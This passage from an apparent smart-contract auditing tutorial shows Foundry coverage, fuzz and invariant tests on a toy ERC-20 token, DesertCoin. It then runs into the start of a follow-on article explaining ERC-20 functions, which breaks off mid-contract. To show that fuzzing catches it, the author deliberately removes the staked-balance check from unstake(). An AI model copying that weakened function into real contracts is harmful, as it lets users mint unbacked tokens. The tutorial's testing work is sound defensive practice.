When auditing a smart contract, one of the key challenges is identifying unverified or weakly tested parts of the code. Even if developers provide a suite of unit tests, they often focus on expected behaviors rather than edge cases or adversarial conditions. This means that vulnerabilities could exist in functions that haven&apos;t been thoroughly tested.

To help detect these gaps, Foundry provides the `forge coverage` command. This tool generates a code coverage report, showing which parts of the contract have been executed during testing and which haven&apos;t. The untested sections are potential risk areas, as they might contain logic flaws or vulnerabilities that were never examined under real test conditions.

To illustrate this, let’s take an example: What happens if we comment out the test cases for `trade()`?

```solidity
    /** 🔄 3. Transfers */
    //function testTrade() public {
    //    vm.prank(user1);
    //    desertCoin.trade(user2, 500 ether);

    //    assertEq(desertCoin.balanceOf(user1), 500 ether);
    //    assertEq(desertCoin.balanceOf(user2), 500 ether);
    //}

    //function testFailTradeInsufficientBalance() public {
    //    vm.prank(user1);
    //    desertCoin.trade(user2, 2000 ether); // Should fail (not enough balance)
    //}

    //function testFailTradeWhilePaused() public {
    //    vm.prank(owner);
    //    desertCoin.pause();

    //    vm.prank(user1);
    //    desertCoin.trade(user2, 100 ether); // Should fail due to pause
    //}

    //function testTradeAfterUnpause() public {
    //    vm.prank(owner);
    //    desertCoin.pause();

    //    vm.prank(owner);
    //    desertCoin.unpause();

    //    vm.prank(user1);
    //    desertCoin.trade(user2, 100 ether); // Should succeed
    //}

```

To analyze test coverage for DesertCoin, we can run:

```solidity
$ forge coverage test/DesertCoin.t.sol  --report lcov 
[⠊] Compiling...
[⠃] Compiling 30 files with Solc 0.8.28
[⠒] Solc 0.8.28 finished in 1.82s
Compiler run successful with warnings:
[...]

Ran 11 tests for test/DesertCoin.t.sol:DesertCoinTest
[PASS] testBuyItem() (gas: 84531)
[PASS] testClaimFaucet() (gas: 54709)
[PASS] testFailBuyItemInsufficientFunds() (gas: 44471)
[PASS] testFailClaimFaucetTwice() (gas: 13321)
[PASS] testFailSetItemPriceByNonOwner() (gas: 14118)
[PASS] testFailStakeInsufficientFunds() (gas: 13740)
[PASS] testFailUnstakeMoreThanStaked() (gas: 52636)
[PASS] testPauseAndUnpause() (gas: 40735)
[PASS] testSetItemPrice() (gas: 40053)
[PASS] testStake() (gas: 55208)
[PASS] testUnstake() (gas: 45871)
Suite result: ok. 11 passed; 0 failed; 0 skipped; finished in 41.54ms (4.39ms CPU time)

```

This confirms that all tests passed, but it doesn’t tell us which parts of the contract were left untested. To visualize the coverage details, we generate an HTML report:

```solidity
$ genhtml --rc derive_function_end_line=0 -o coverage-report lcov.info
Found 1 entries.
Found common filename prefix &quot;/home/rsgbengi/Projects/web3/FuzzTesting&quot;
Generating output.
Processing file src/DesertCoin.sol
  lines=27 hit=24 functions=10 hit=9
Overall coverage rate:
  lines......: 88.9% (24 of 27 lines)
  functions......: 90.0% (9 of 10 functions)

```

Examining the LCOV report, we see that most of the contract is covered, except for the trade function.

![](/content/images/2025/03/image.png)

![](/content/images/2025/03/image-1.png)

Since we commented out the trade tests, this function was never executed during testing. The red-highlighted lines in the LCOV report confirm this.

This is a **major red flag** because:

1.  **Balance validation wasn’t tested** – What if `_transfer()` is incorrectly handling balances?
2.  **Zero-address transfers weren’t checked** – Could this be exploited to send tokens to an invalid destination?
3.  **Pause functionality might not be enforced** – Does `trade()` still execute if the contract is paused?

If this function contained a security flaw, it would have gone unnoticed because no test ever triggered it.

# **Advanced Testing: Pushing Smart Contracts Beyond Unit Tests**

Up to this point, we’ve focused on unit testing, which developers typically provide when delivering a smart contract for audit. These tests ensure that basic functionality works as expected, but they don’t tell us how the contract behaves under unpredictable conditions, adversarial inputs, or complex interactions over time. This is where fuzzing and invariant testing come in.

Unlike unit tests, these advanced techniques aren’t usually included in the initial test suite. As auditors, it’s up to us to implement them ourselves or have a prepared set of cases to quickly assess vulnerabilities depending on the contract we’re analyzing. By incorporating these methods into our workflow, we can uncover issues that traditional tests might miss.

## **Thinking Like an Attacker: Brainstorming Potential Threats**

Before jumping into fuzzing and invariant testing, it’s important to take a step back and think about the contract from an attacker&apos;s perspective. Instead of just verifying that functions return expected outputs, we should ask ourselves:

-   What are the most critical functions in this contract?
-   How could an attacker break them?
-   Are there any unintended behaviors if we pass extreme or malformed inputs?
-   Could race conditions, reentrancy, or gas manipulation cause issues?
-   What happens if multiple users interact at the same time?

This type of threat modeling helps us design better fuzzing tests. By brainstorming potential weaknesses, we can identify which areas deserve aggressive testing and ensure that our test cases reflect realistic attack scenarios.

## **Introducing Fuzzing: Breaking the Contract with Unexpected Inputs**

Now that we’ve thought like an attacker and considered potential threats, it’s time to apply fuzzing to stress-test the contract. Unlike unit tests, which check for specific inputs and expected outputs, fuzzing generates random or extreme values to test contract behavior under unpredictable conditions.

The goal of fuzzing is to break the contract—or at least find unexpected behaviors that developers might not have accounted for. This technique helps us uncover vulnerabilities such as:

-   **Integer overflows and underflows**
-   **Logic errors caused by edge cases**
-   **Unexpected reverts or unhandled failures**
-   **State inconsistencies when multiple users interact**
-   **Gas exhaustion vulnerabilities**

As auditors, we rarely receive fuzzing tests from developers, meaning it’s up to us to implement them ourselves. Depending on the type of contract we’re analyzing, we can define a set of fuzzing cases in advance to check for common vulnerabilities. For example, in ERC20-based tokens, we might want to test transfers, staking, and marketplace interactions under extreme conditions.

To illustrate how we can implement fuzzing, let’s walk through a series of examples using Foundry.

&lt;details&gt;
&lt;summary&gt;Fuzzing testing of DesertCoin&lt;/summary&gt;

```solidity
import &quot;forge-std/Test.sol&quot;;
import &quot;../src/DesertCoin.sol&quot;;

contract DesertCoinFuzzTest is Test {
    DesertCoin desertCoin;
    address owner = address(1);
    address user1 = address(2);
    address user2 = address(3);

    uint256 initialSupply = 1_000_000 ether;

    function setUp() public {
        vm.startPrank(owner);
        desertCoin = new DesertCoin(initialSupply);
        desertCoin.transfer(user1, 1000 ether);
        vm.stopPrank();
    }

    /** Fuzz test for trade() */
    function testFuzzTrade(uint256 amount) public {
        vm.assume(amount &gt; 0 &amp;&amp; amount &lt;= 1000 ether);

        uint256 initialBalanceUser1 = desertCoin.balanceOf(user1);
        uint256 initialBalanceUser2 = desertCoin.balanceOf(user2);

        if (amount &lt;= initialBalanceUser1) {
            vm.prank(user1);
            desertCoin.trade(user2, amount);

            assertEq(desertCoin.balanceOf(user1), initialBalanceUser1 - amount);
            assertEq(desertCoin.balanceOf(user2), initialBalanceUser2 + amount);
        } else {
            vm.expectRevert(&quot;Insufficient balance&quot;);
            vm.prank(user1);
            desertCoin.trade(user2, amount);
        }
    }

    /** Fuzz test for stake() */
    function testFuzzStake(uint256 amount) public {
        vm.assume(amount &gt; 0 &amp;&amp; amount &lt;= 1000 ether);

        uint256 initialBalance = desertCoin.balanceOf(user1);

        if (amount &lt;= initialBalance) {
            vm.prank(user1);
            desertCoin.stake(amount);

            assertEq(desertCoin.stakedBalance(user1), amount);
            assertEq(desertCoin.balanceOf(user1), initialBalance - amount);
        } else {
            vm.expectRevert(&quot;Insufficient DSC&quot;);
            vm.prank(user1);
            desertCoin.stake(amount);
        }
    }

    /** Fuzz test for unstake() */
    function testFuzzUnstake(uint256 amount) public {
        vm.assume(amount &gt; 0 &amp;&amp; amount &lt;= 1000 ether);

        vm.prank(user1);
        desertCoin.stake(500 ether);

        uint256 initialStaked = desertCoin.stakedBalance(user1);
        uint256 initialBalance = desertCoin.balanceOf(user1);

        if (amount &lt;= initialStaked) {
            vm.prank(user1);
            desertCoin.unstake(amount);

            assertEq(desertCoin.stakedBalance(user1), initialStaked - amount);
            assertEq(desertCoin.balanceOf(user1), initialBalance + amount);
        } else {
            vm.expectRevert(&quot;Not enough staked&quot;);
            vm.prank(user1);
            desertCoin.unstake(amount);
        }
    }

    /** Fuzz test for buyItem() */
    function testFuzzBuyItem(uint256 price) public {
        vm.assume(price &gt; 0 &amp;&amp; price &lt;= 1000 ether);

        vm.prank(owner);
        desertCoin.setItemPrice(1, price);

        uint256 initialBalance = desertCoin.balanceOf(user1);

        if (price &lt;= initialBalance) {
            vm.prank(user1);
            desertCoin.buyItem(1);

            assertTrue(desertCoin.purchasedItems(user1, 1));
            assertEq(desertCoin.balanceOf(user1), initialBalance - price);
        } else {
            vm.expectRevert(&quot;Not enough DSC&quot;);
            vm.prank(user1);
            desertCoin.buyItem(1);
        }
    }

    /** Fuzz test for setItemPrice() */
    function testFuzzSetItemPrice(uint256 price) public {
        vm.assume(price &gt; 0 &amp;&amp; price &lt;= 1000 ether);

        vm.prank(owner);
        desertCoin.setItemPrice(1, price);

        assertEq(desertCoin.itemPrices(1), price);
    }

    function testFailFuzzSetItemPriceByNonOwner(uint256 price) public {
        vm.assume(price &gt; 0 &amp;&amp; price &lt;= 1000 ether);

        vm.prank(user1);
        desertCoin.setItemPrice(1, price); // Should fail
    }
}

```
&lt;/details&gt;


### **Fuzzing the Trade Function**

Transfers between users are one of the most common operations in ERC20-based contracts. If not properly tested, they can be exploited to manipulate balances, bypass restrictions, or trigger unintended behaviors. To ensure the reliability of transfers, it&apos;s important to test various scenarios. This includes verifying that random trade amounts work correctly for any valid input, ensuring that users cannot send more tokens than they own to prevent negative balances, and confirming that zero-value transfers don’t break contract logic. Additionally, handling extreme values, such as the maximum `uint256`, helps uncover potential overflow issues that could lead to unexpected contract behavior.

```solidity
function testFuzzTrade(uint256 amount) public {
    vm.assume(amount &gt; 0 &amp;&amp; amount &lt;= 1000 ether);

    uint256 initialBalanceUser1 = desertCoin.balanceOf(user1);
    uint256 initialBalanceUser2 = desertCoin.balanceOf(user2);

    if (amount &lt;= initialBalanceUser1) {
        vm.prank(user1);
        desertCoin.trade(user2, amount);

        assertEq(desertCoin.balanceOf(user1), initialBalanceUser1 - amount);
        assertEq(desertCoin.balanceOf(user2), initialBalanceUser2 + amount);
    } else {
        vm.expectRevert(&quot;Insufficient balance&quot;);
        vm.prank(user1);
        desertCoin.trade(user2, amount);
    }
}

```

### **Fuzzing the Staking Mechanism**

Staking requires burning tokens, so miscalculations could lead to lost funds or negative balances. To ensure proper functionality, it&apos;s crucial to test different stake amounts, verifying that balance updates are correctly tracked. Users should not be able to stake more than they own, preventing unintended losses. Additionally, testing extreme values like `0` or `MAX_UINT256` helps identify unexpected behaviors that could compromise the contract&apos;s integrity.

```solidity
function testFuzzStake(uint256 amount) public {
    vm.assume(amount &gt; 0 &amp;&amp; amount &lt;= 1000 ether);

    uint256 initialBalance = desertCoin.balanceOf(user1);

    if (amount &lt;= initialBalance) {
        vm.prank(user1);
        desertCoin.stake(amount);

        assertEq(desertCoin.stakedBalance(user1), amount);
        assertEq(desertCoin.balanceOf(user1), initialBalance - amount);
    } else {
        vm.expectRevert(&quot;Insufficient DSC&quot;);
        vm.prank(user1);
        desertCoin.stake(amount);
    }
}

```

### Fuzzing the Unstaking Function

Users should only be able to unstake the amount they have actually staked. If not properly enforced, this could lead to fund inflation or unauthorized withdrawals. To ensure correct behavior, testing should cover various unstake amounts, verifying that users cannot withdraw more than their staked balance. Additionally, it&apos;s important to confirm that balances update correctly after unstaking and to test multiple sequential unstake calls to detect potential inconsistencies.

```solidity
function testFuzzUnstake(uint256 amount) public {
    vm.assume(amount &gt; 0 &amp;&amp; amount &lt;= 1000 ether);

    vm.prank(user1);
    desertCoin.stake(500 ether);

    uint256 initialStaked = desertCoin.stakedBalance(user1);
    uint256 initialBalance = desertCoin.balanceOf(user1);

    if (amount &lt;= initialStaked) {
        vm.prank(user1);
        desertCoin.unstake(amount);

        assertEq(desertCoin.stakedBalance(user1), initialStaked - amount);
        assertEq(desertCoin.balanceOf(user1), initialBalance + amount);
    } else {
        vm.expectRevert(&quot;Not enough staked&quot;);
        vm.prank(user1);
        desertCoin.unstake(amount);
    }
}

```

### **Fuzzing the Buy Item Function**

Buying in-game items with DesertCoin requires accurate balance checks. Miscalculations could allow users to obtain items for free, spend negative amounts due to unchecked math, or disrupt the in-game economy. Testing should include a range of item prices to ensure flexibility, verifying that users cannot purchase items without sufficient balance. It’s also crucial to handle edge cases, such as zero-price items or unusually large values, to prevent unintended behaviors.

```solidity
function testFuzzBuyItem(uint256 price) public {
    vm.assume(price &gt; 0 &amp;&amp; price &lt;= 1000 ether);

    vm.prank(owner);
    desertCoin.setItemPrice(1, price);

    uint256 initialBalance = desertCoin.balanceOf(user1);

    if (price &lt;= initialBalance) {
        vm.prank(user1);
        desertCoin.buyItem(1);

        assertTrue(desertCoin.purchasedItems(user1, 1));
        assertEq(desertCoin.balanceOf(user1), initialBalance - price);
    } else {
        vm.expectRevert(&quot;Not enough DSC&quot;);
        vm.prank(user1);
        desertCoin.buyItem(1);
    }
}

```

### Running the test

Now that we have implemented fuzzing tests for key functions in `DesertCoin`, let&apos;s see how we can execute them and analyze the results. We&apos;ll demonstrate how fuzzing initially passes all tests, and then, after introducing a bug in `unstake()`, the test suite detects the issue.

Initially, we run the fuzzing tests without modifying the contract:

```solidity
forge test test/DesertCoinFuzzing.t.sol

```

The output confirms that all fuzzing tests pass successfully:

![](/content/images/2025/03/image-4.png)

To simulate a real-world vulnerability, we modify the unstake function to remove the balance check:

```solidity
function unstake(uint256 amount) public {
        //require(stakedBalance[msg.sender] &gt;= amount, &quot;Not enough staked&quot;);

        _mint(msg.sender, amount);
        stakedBalance[msg.sender] -= amount;
        emit TokensUnstaked(msg.sender, amount);
    }

```

This allows users to unstake more tokens than they actually staked, effectively creating free tokens out of thin air.

Now, we rerun the same fuzzing tests:

```bash
forge test test/DesertCoinFuzzing.t.sol

```

This time, the fuzzer detects an issue in `testFuzzUnstake()`:

![](/content/images/2025/03/image-2.png)

The test fails because the function allows negative staked balances, triggering an arithmetic underflow.

## **Invariant Testing: Ensuring Smart Contract Stability Over Time**

Traditional unit tests focus on individual function calls, verifying expected inputs and outputs. However, smart contracts often experience unpredictable interactions, where users call functions in varying sequences. Invariant testing ensures that a contract’s fundamental properties always hold, regardless of how functions are executed.

Foundry automates this process by randomly selecting and executing contract functions with fuzzed inputs, simulating real-world usage. After each call, it checks whether the contract still satisfies predefined invariants—such as token supply consistency, balance integrity, or state transitions. If an invariant breaks, Foundry halts the test and provides a detailed trace, making it easy to pinpoint vulnerabilities.

Unlike standard tests that examine isolated cases, invariant testing runs hundreds or thousands of transactions in a single test, exposing subtle bugs that emerge over time. This makes it an essential tool for smart contract security, especially in financial protocols where stability and consistency are critical. Let&apos;s see some examples:

&lt;details&gt;
&lt;summary&gt;Invariant Testing DesertCoin&lt;/summary&gt;

```solidity
pragma solidity ^0.8.19;

import &quot;forge-std/Test.sol&quot;;
import &quot;forge-std/StdInvariant.sol&quot;;
import &quot;../src/DesertCoin.sol&quot;;

contract DesertCoinInvariantTest is StdInvariant, Test {
    DesertCoin desertCoin;
    address owner = address(1);
    address user1 = address(2);
    address user2 = address(3);

    uint256 initialSupply = 1_000_000 ether;

    function setUp() public {
        vm.startPrank(owner);
        desertCoin = new DesertCoin(initialSupply);
        desertCoin.transfer(user1, 1000 ether);
        desertCoin.transfer(user2, 1000 ether);
        vm.stopPrank();

        // Register contract for invariant testing
        targetContract(address(desertCoin));
    }

    function invariant_totalSupplyConstant() public {
        assertEq(desertCoin.totalSupply(), initialSupply);
    }

    function invariant_tradeDoesNotDestroyTokens() public {
        address sender = user1;
        address recipient = user2;
        uint256 tradeAmount = 10 ether;

        uint256 balanceSenderBefore = desertCoin.balanceOf(sender);
        uint256 balanceRecipientBefore = desertCoin.balanceOf(recipient);
        uint256 totalSupplyBefore = desertCoin.totalSupply();

        if (balanceSenderBefore &gt;= tradeAmount) {
            vm.prank(sender);
            desertCoin.trade(recipient, tradeAmount);
        }

        uint256 balanceSenderAfter = desertCoin.balanceOf(sender);
        uint256 balanceRecipientAfter = desertCoin.balanceOf(recipient);
        uint256 totalSupplyAfter = desertCoin.totalSupply();

        assertEq(
            balanceSenderBefore + balanceRecipientBefore,
            balanceSenderAfter + balanceRecipientAfter
        );
        assertEq(totalSupplyBefore, totalSupplyAfter);
    }

    function invariant_stakedBalanceCorrect() public {
        address staker = user1;
        uint256 stakeAmount = 10 ether;

        uint256 balanceBefore = desertCoin.balanceOf(staker);
        uint256 stakedBefore = desertCoin.stakedBalance(staker);
        uint256 totalSupplyBefore = desertCoin.totalSupply();

        if (balanceBefore &gt;= stakeAmount) {
            vm.prank(staker);
            desertCoin.stake(stakeAmount);
        }

        uint256 balanceAfter = desertCoin.balanceOf(staker);
        uint256 stakedAfter = desertCoin.stakedBalance(staker);
        uint256 totalSupplyAfter = desertCoin.totalSupply();

        assertEq(balanceBefore - balanceAfter, stakedAfter - stakedBefore);
        assertEq(totalSupplyBefore, totalSupplyAfter);
    }

    function invariant_validItemPurchases() public {
        uint256 itemId = 1;
        uint256 itemPrice = 50 ether;

        // Owner establece el precio del ítem
        vm.prank(owner);
        desertCoin.setItemPrice(itemId, itemPrice);

        uint256 balanceBefore = desertCoin.balanceOf(user1);

        if (balanceBefore &gt;= itemPrice) {
            vm.prank(user1);
            desertCoin.buyItem(itemId);
        } else {
            vm.expectRevert(&quot;Not enough DSC&quot;);
            vm.prank(user1);
            desertCoin.buyItem(itemId);
        }

        uint256 balanceAfter = desertCoin.balanceOf(user1);
        assertLe(balanceAfter, balanceBefore);
    }


    function invariant_cannotUnstakeMoreThanStaked() public {
        address staker = user1;
        uint256 unstakeAmount = 20 ether;

        uint256 stakedBalanceBefore = desertCoin.stakedBalance(staker);
        uint256 balanceBefore = desertCoin.balanceOf(staker);

        if (unstakeAmount &gt; stakedBalanceBefore) {
            vm.expectRevert(&quot;Not enough staked&quot;);
            vm.prank(staker);
            desertCoin.unstake(unstakeAmount);
        } else {
            vm.prank(staker);
            desertCoin.unstake(unstakeAmount);
        }

        uint256 stakedBalanceAfter = desertCoin.stakedBalance(staker);
        uint256 balanceAfter = desertCoin.balanceOf(staker);

        assertLe(stakedBalanceAfter, stakedBalanceBefore);
        assertGe(balanceAfter, balanceBefore);
    }
}

```
&lt;/details&gt;


### Total Supply Must Remain Constant

```solidity
function invariant_totalSupplyConstant() public {
    assertEq(desertCoin.totalSupply(), initialSupply);
}

```

This test enforces the most fundamental property of a token: the total supply must remain unchanged unless explicitly modified by an authorized mechanism. No function in the contract should accidentally mint or burn tokens, ensuring that no unexpected inflation or deflation occurs.

### **Token Transfers Do Not Destroy Tokens**

```solidity
function invariant_tradeDoesNotDestroyTokens() public {
    // Simulates a trade between two users
    address sender = user1;
    address recipient = user2;
    uint256 tradeAmount = 10 ether;

    uint256 balanceSenderBefore = desertCoin.balanceOf(sender);
    uint256 balanceRecipientBefore = desertCoin.balanceOf(recipient);
    uint256 totalSupplyBefore = desertCoin.totalSupply();

    if (balanceSenderBefore &gt;= tradeAmount) {
        vm.prank(sender);
        desertCoin.trade(recipient, tradeAmount);
    }

    uint256 balanceSenderAfter = desertCoin.balanceOf(sender);
    uint256 balanceRecipientAfter = desertCoin.balanceOf(recipient);
    uint256 totalSupplyAfter = desertCoin.totalSupply();

    // Ensure no tokens were destroyed or created during a trade
    assertEq(balanceSenderBefore + balanceRecipientBefore, balanceSenderAfter + balanceRecipientAfter);
    assertEq(totalSupplyBefore, totalSupplyAfter);
}

```

A trade operation should only redistribute tokens between users without affecting the total supply. This test ensures that transfers are lossless and that token balances adjust correctly after each transaction.

### **Staked Balance Integrity**

```solidity
function invariant_stakedBalanceCorrect() public {
    address staker = user1;
    uint256 stakeAmount = 10 ether;

    uint256 balanceBefore = desertCoin.balanceOf(staker);
    uint256 stakedBefore = desertCoin.stakedBalance(staker);
    uint256 totalSupplyBefore = desertCoin.totalSupply();

    if (balanceBefore &gt;= stakeAmount) {
        vm.prank(staker);
        desertCoin.stake(stakeAmount);
    }

    uint256 balanceAfter = desertCoin.balanceOf(staker);
    uint256 stakedAfter = desertCoin.stakedBalance(staker);
    uint256 totalSupplyAfter = desertCoin.totalSupply();

    // Ensure the amount staked matches the amount removed from the balance
    assertEq(balanceBefore - balanceAfter, stakedAfter - stakedBefore);
    assertEq(totalSupplyBefore, totalSupplyAfter);
}

```

When users stake tokens, their balance should decrease while their staked balance increases by the same amount. This test ensures that the contract correctly accounts for all staked tokens, preventing inconsistencies in the staking logic.

### **Only Valid Item Purchases Are Allowed**

```solidity
function invariant_validItemPurchases() public {
    uint256 itemId = 1;
    uint256 itemPrice = 50 ether;

    // Owner sets the item price
    vm.prank(owner);
    desertCoin.setItemPrice(itemId, itemPrice);

    uint256 balanceBefore = desertCoin.balanceOf(user1);

    if (balanceBefore &gt;= itemPrice) {
        vm.prank(user1);
        desertCoin.buyItem(itemId);
    } else {
        vm.expectRevert(&quot;Not enough DSC&quot;);
        vm.prank(user1);
        desertCoin.buyItem(itemId);
    }

    uint256 balanceAfter = desertCoin.balanceOf(user1);

    // Ensure no illegal transactions occur
    assertLe(balanceAfter, balanceBefore);
}

```

Users should only be able to purchase items if they have enough funds. This test prevents unintended purchases and ensures that users cannot buy items without sufficient balance. If the purchase is invalid, the transaction should revert properly, maintaining contract security.

### **Users Can’t Unstake More Than They Staked**

```solidity
function invariant_cannotUnstakeMoreThanStaked() public {
    address staker = user1;
    uint256 unstakeAmount = 20 ether;

    uint256 stakedBalanceBefore = desertCoin.stakedBalance(staker);
    uint256 balanceBefore = desertCoin.balanceOf(staker);

    if (unstakeAmount &gt; stakedBalanceBefore) {
        vm.expectRevert(&quot;Not enough staked&quot;);
        vm.prank(staker);
        desertCoin.unstake(unstakeAmount);
    } else {
        vm.prank(staker);
        desertCoin.unstake(unstakeAmount);
    }

    uint256 stakedBalanceAfter = desertCoin.stakedBalance(staker);
    uint256 balanceAfter = desertCoin.balanceOf(staker);

    // Ensure users can&apos;t unstake more than they actually staked
    assertLe(stakedBalanceAfter, stakedBalanceBefore);
    assertGe(balanceAfter, balanceBefore);
}

```

Staking only works if users can properly withdraw their staked funds—but they should never be able to unstake more than they originally staked. This test ensures unstaking logic remains correct, preventing unintended balance manipulation.

### Running the tests

If we execute our invariant tests, we immediately notice a failure in `invariant_stakedBalanceCorrect`.

![](/content/images/2025/03/image-5.png)

The error occurs because the total supply changes when staking and unstaking due to the use of `_burn` and `_mint`. This violates the invariant that the total token supply should remain constant unless explicitly modified by the contract logic.

Since staking is just locking tokens, burning and minting aren’t strictly necessary. Instead, we can transfer tokens to the contract and back. This approach ensures that the total supply remains unchanged while still enforcing staking logic.

However, it&apos;s important to note that this is just one possible implementation. Some protocols prefer using `_burn` and `_mint` for staking mechanisms to prevent potential reentrancy issues, avoid token accumulation in the contract, and ensure compatibility with standards like ERC-4626. While transferring tokens directly to the contract can simplify tracking and reduce supply fluctuations, it may introduce security risks if not properly managed. Choosing between these approaches depends on the specific needs and security considerations of the protocol.

```solidity
    /**  Block the tokens for staking */
    function stake(uint256 amount) public {
        require(balanceOf(msg.sender) &gt;= amount, &quot;Insufficient DSC&quot;);

        //_burn(msg.sender, amount);
        _transfer(msg.sender, address(this), amount);
        stakedBalance[msg.sender] += amount;
        emit TokensStaked(msg.sender, amount);
    }

    function unstake(uint256 amount) public {
        require(stakedBalance[msg.sender] &gt;= amount, &quot;Not enough staked&quot;);

        //_mint(msg.sender, amount);
        stakedBalance[msg.sender] -= amount;
        _transfer(address(this), msg.sender, amount); 
        emit TokensUnstaked(msg.sender, amount);
    }

```

With this correction, we execute the invariant tests again:

![](/content/images/2025/03/image-6.png)

Now, `invariant_stakedBalanceCorrect` passes successfully, confirming that the total token supply remains unchanged while still enforcing correct staking behavior.

# Conclusions

In this chapter, we explored **unit testing, fuzzing, and invariant testing** to identify and mitigate vulnerabilities in smart contracts.

-   **Unit testing** ensures functions behave as expected under controlled conditions.
-   **Fuzzing** exposes hidden edge cases and unexpected failures.
-   **Invariant testing** verifies that core contract properties remain intact across multiple transactions.

Effective testing is key to securing smart contracts. Combining these methods enhances reliability and helps catch potential flaws before deployment.

# References

-   Foundry Documentation. &quot;Foundry Book: A Guide to Smart Contract Development &amp; Testing.&quot; Available at: https://book.getfoundry.sh/
-   OpenZeppelin Documentation. &quot;ERC20: Standard Token Implementation.&quot; Available at: [https://docs.openzeppelin.com/contracts/4.x/api/token/erc20](https://docs.openzeppelin.com/contracts/4.x/api/token/erc20)
-   Solidity Documentation. &quot;Solidity 0.8.x Breaking Changes.&quot; Available at: [https://docs.soliditylang.org/en/latest/080-breaking-changes.html](https://docs.soliditylang.org/en/latest/080-breaking-changes.html)</content:encoded><author>Ruben Santos</author></item><item><title>Hacking ERC-20: Pentesting the Most Common Ethereum Token Standard</title><link>https://www.kayssel.com/post/web3-14</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-14</guid><description>ERC-20 tokens power Ethereum, but poor implementations can be riddled with vulnerabilities. From integer overflows to reentrancy and front-running attacks, pentesters must scrutinize contracts. This chapter explores key flaws, exploits, and Foundry-based testing to break and secure ERC-20 tokens. 🚀</description><pubDate>Sun, 02 Mar 2025 10:07:31 GMT</pubDate><content:encoded># **Pentesting ERC-20 Tokens: How Secure Are They Really?**

ERC-20 tokens are everywhere. They power DeFi, fuel governance models, and sometimes, let’s be honest, exist purely as **glorified meme coins**. Whether it’s **USDT, LINK, or some random token airdropped into your wallet that you’re too scared to click on**, ERC-20 is the standard that defines how fungible tokens work on Ethereum.

But here’s the thing—**not all ERC-20 implementations are created equal**. A poorly written contract can be **a ticking time bomb**, just waiting for someone to exploit it. **Front-running attacks, integer overflows, reentrancy bugs, and minting vulnerabilities** are just a few of the common security flaws lurking in ERC-20 tokens. And as a pentester, these are exactly the kinds of weaknesses you should be hunting for.

In this article, we’ll break down ERC-20 security **from an offensive perspective**. We’ll go beyond the basics, looking at **common vulnerabilities, real-world exploits, and practical testing techniques using Foundry**. By the end, you’ll not only understand how ERC-20 tokens work—you’ll know how to **break them, fix them, and make sure they’re battle-tested against attacks**.

So, if you’re ready to **hack some smart contracts** (ethically, of course), let’s get started. 🚀💀

# What is an ERC-20 Token?

ERC-20 is a technical standard that defines how fungible tokens should behave on the Ethereum network. Think of it as a rulebook for developers to create tokens that can seamlessly interact with wallets, exchanges, and other smart contracts. It&apos;s like having a universal charger for all your devices—no compatibility headaches.

The standard includes essential functions like checking balances, transferring tokens, and approving spending. For example, when you send USDT from one wallet to another, it’s the ERC-20 standard that ensures the process works the same way across the entire Ethereum ecosystem.

Why does it matter? Because it simplifies everything. Developers can build without reinventing the wheel, and users can trust that their tokens will work across platforms without issues. It’s one of the main reasons Ethereum became the go-to blockchain for decentralized applications (dApps) and Initial Coin Offerings (ICOs) back in the day.

To better understand how ERC-20 works under the hood, let’s break down the core functions that every compliant token must implement. These aren’t just technicalities—they’re the foundation that ensures your token can move, be tracked, and interact with the Ethereum ecosystem safely and efficiently.

# Core Functions of an ERC-20 Token

Now that we know what an ERC-20 token is, let’s look at what actually makes one tick. Every ERC-20 token follows a set of mandatory and optional functions that define how it behaves on the Ethereum blockchain. Without these, a token wouldn’t be able to interact with wallets, exchanges, or even other smart contracts.

Here’s a breakdown of the key functions:

### 🧮 1. `totalSupply`

This function returns the total amount of tokens that exist for a particular contract. It’s like checking how many coins were minted in total. This supply can be fixed or dynamic, depending on the token&apos;s design.

```solidity
function totalSupply() public view returns (uint256);

```

#### 💰 2. `balanceOf`

If you’ve ever wondered how your wallet knows how many tokens you own, this is the function behind it. It returns the balance of a specific address.

```solidity
function balanceOf(address account) public view returns (uint256);

```

#### 🔄 3. `transfer`

This function allows a user to send tokens from their address to another. It’s the bread and butter of any token transaction.

```solidity
function transfer(address recipient, uint256 amount) public returns (bool);

```

If the transfer is successful, it returns `true`. If not, the transaction reverts. Simple, but essential.

#### ✅ 4. `approve`

Imagine lending your friend some money but only allowing them to spend a certain amount. That’s what `approve` does. It allows an address to spend tokens on behalf of the owner, but only up to a specific limit.

```solidity
function approve(address spender, uint256 amount) public returns (bool);

```

This is particularly useful for decentralized exchanges (DEXs), where you approve the exchange to handle your tokens without giving full control.

#### 🔁 5. `transferFrom`

Once an address has approval to spend tokens, `transferFrom` is the function that actually moves them. It’s how smart contracts execute transactions on behalf of users.

```solidity
function transferFrom(address sender, address recipient, uint256 amount) public returns (bool);

```

Think of it like a subscription service automatically charging your card—except here, it&apos;s tokens being moved after prior approval.

#### 📏 6. `allowance`

This function checks how many tokens an address is allowed to spend on behalf of another. It’s like asking, _&quot;How much has the owner authorized for me to use?&quot;_

```solidity
function allowance(address owner, address spender) public view returns (uint256);

```

&lt;details&gt;
&lt;summary&gt;A typical ERC20 workflow is as follows:&lt;/summary&gt;

```mermaid
sequenceDiagram
    participant UserA as User A
    participant UserB as User B
    participant Contract as ERC-20 Contract

    %% Consulta de saldo
    UserA-&gt;&gt;Contract: balanceOf(A)
    Contract--&gt;&gt;UserA: Returns Balance

    %% Aprobación de gasto
    UserA-&gt;&gt;Contract: approve(B, 100 tokens)
    Contract-&gt;&gt;Contract: Set Allowance (A → B: 100)

    %% Transferencia directa
    UserA-&gt;&gt;Contract: transfer(B, 50 tokens)
    Contract-&gt;&gt;Contract: Update balances
    Contract-&gt;&gt;UserB: Emit Transfer Event

    %% Transferencia con aprobación
    UserB-&gt;&gt;Contract: transferFrom(A, B, 50 tokens)
    Contract-&gt;&gt;Contract: Check &amp; Update Allowance
    Contract-&gt;&gt;UserB: Emit Transfer Event

```
&lt;/details&gt;


# Example of a Basic ERC-20 Contract

Now that we understand the core functions of an ERC-20 token, let’s look at a hands-on example. This is a simple contract for a token called **DesertCoin** with the symbol **DSC**. It shows how the standard functions work together to create a functional token.

Here’s the code:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract DesertCoin {
    string public name = &quot;DesertCoin&quot;;
    string public symbol = &quot;DSC&quot;;
    uint8 public decimals = 18;
    uint256 public totalSupply;

    mapping(address =&gt; uint256) public balanceOf;
    mapping(address =&gt; mapping(address =&gt; uint256)) public allowance;

    event Transfer(address indexed from, address indexed to, uint256 value);
